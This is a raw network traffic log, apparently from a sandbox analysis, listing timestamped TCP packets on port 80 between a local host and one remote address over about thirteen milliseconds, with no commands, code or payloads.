                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.802746058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.802839994 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.802881002 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803097010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803172112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803211927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803244114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803352118 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803385973 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803419113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803488970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803525925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803603888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803827047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.803864002 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804105997 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804291964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804326057 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804358959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804550886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804584026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804605961 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804761887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804805040 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804826975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804896116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804929972 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804934978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.804999113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805031061 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805053949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805130959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805165052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805213928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805346012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805385113 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805469036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805512905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805551052 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805552006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805620909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805660009 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805713892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805802107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805835009 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.805932999 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806041956 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806080103 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806130886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806200027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806236029 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806287050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806348085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806385994 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806472063 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806643009 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806685925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806767941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806835890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806866884 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806900978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.806992054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807027102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807073116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807164907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807197094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807363987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807461023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807502031 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807588100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807681084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807718039 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807800055 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807885885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.807923079 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808000088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808074951 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808115005 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808147907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808202028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808235884 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808258057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808334112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808367014 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808451891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808615923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808655977 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808707952 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808773041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808808088 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808847904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808921099 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.808953047 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809001923 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809037924 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809072018 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809087038 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809187889 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809226990 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809434891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809511900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809542894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809549093 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809618950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809653997 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809731007 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809772968 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809811115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809829950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809935093 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809973001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.809995890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810106039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810141087 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810193062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810354948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810389042 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810421944 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810534954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810571909 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810605049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810659885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810693026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810744047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810827017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810862064 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.810895920 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811001062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811033964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811069965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811135054 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811168909 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811228991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811330080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811366081 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811518908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811604023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811639071 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811690092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811825991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811866999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811899900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.811997890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812041044 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812076092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812161922 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812196016 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812326908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812419891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812453032 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812513113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812544107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812580109 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812613010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812669039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812701941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812732935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812822104 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812861919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812869072 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.812983036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813019037 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813054085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813222885 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813265085 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813386917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813466072 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813505888 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813515902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813572884 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813611984 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813632965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813689947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813726902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813730001 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813853979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813889027 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.813971996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814040899 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814080000 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814115047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814150095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814162970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814178944 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814186096 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814229012 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814246893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814273119 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814307928 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814320087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814332962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814363003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814373016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814418077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814429998 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814457893 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814470053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814508915 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814532995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814546108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814558029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814579964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814624071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814636946 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814661026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814661026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814683914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814701080 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814704895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814742088 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814819098 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814831972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814843893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814863920 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814867020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814879894 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814901114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814903975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814917088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814937115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814939022 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814971924 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814973116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.814985991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815016985 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815041065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815099001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815113068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815134048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815143108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815191031 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815193892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815207958 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815218925 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815241098 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815258026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815269947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815290928 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815304041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815316916 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815334082 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815340996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815375090 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815398932 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815412045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815426111 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815444946 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815454960 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815469027 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815489054 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815521002 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815557003 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815568924 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815613985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815628052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815649986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815685987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815716028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815721035 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815730095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815762997 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815768957 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.815777063 CET8049706104.21.73.195192.168.2.5
